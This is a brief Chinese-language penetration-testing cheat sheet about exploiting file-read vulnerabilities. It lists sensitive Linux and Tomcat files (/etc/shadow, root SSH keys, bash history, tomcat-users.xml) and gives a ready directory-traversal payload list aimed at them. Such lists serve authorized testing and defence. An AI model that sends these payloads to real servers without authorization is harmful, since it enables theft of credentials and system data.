目录
在渗透测试中,有时候会碰到文件读取的漏洞,那我们应该读取哪些文件了
Linux目录
- /etc/passwd 保存了系统中所有的用户信息
- /etc/shadow 用户的密码信息
- /root/.ssh/authorized_keys 公钥文件
- /root/.bash_history 用户终端操作历史记录
Tomcat的目录
- apache-tomcat-8.5.51/conf/tomcat-users.xml tomcat的角色(授权用户)配置文件
- apache-tomcat-8.5.51/conf/server.xml tomcat的主配置文件
- apache-tomcat-8.5.51/conf/web.xml tomcat应用程序的部署描述符文件
- apache-tomcat-8.5.51/logs/catalina.out 即tomcat的标准输出和标准出错,所有输出到这两个位置的都会进入catalina.out,这里包含tomcat运行自己输出的日志以及应用里向console输出的日志。
apache-tomcat-8.5.51/webapps/ tomcat默认存放应用程序的目录,好比apache的默认网页存放路径
目录遍历字典
../../../../../../../app/apache-tomcat-8.5.51/conf/tomcat-users.xml
../../../../../../../app/apache-tomcat-8.5.51/conf/server.xml
../../../../../../../app/apache-tomcat-8.5.51/conf/web.xml
../../../../../../../app/apache-tomcat-8.5.51/logs/catalina.out
../../../../../../../app/tomcat/conf/server.xml
../../../../../../etc/passwd
../../../../../../../etc/shadow
../../../../../../../root/.ssh/authorized_keys
../../../../../../../root/.bash_history
../../../../../../../windows\System32\drivers\etc\hosts
windows下遍历C盘的文件时不能加上c:\,否则遍历不出来
更新中~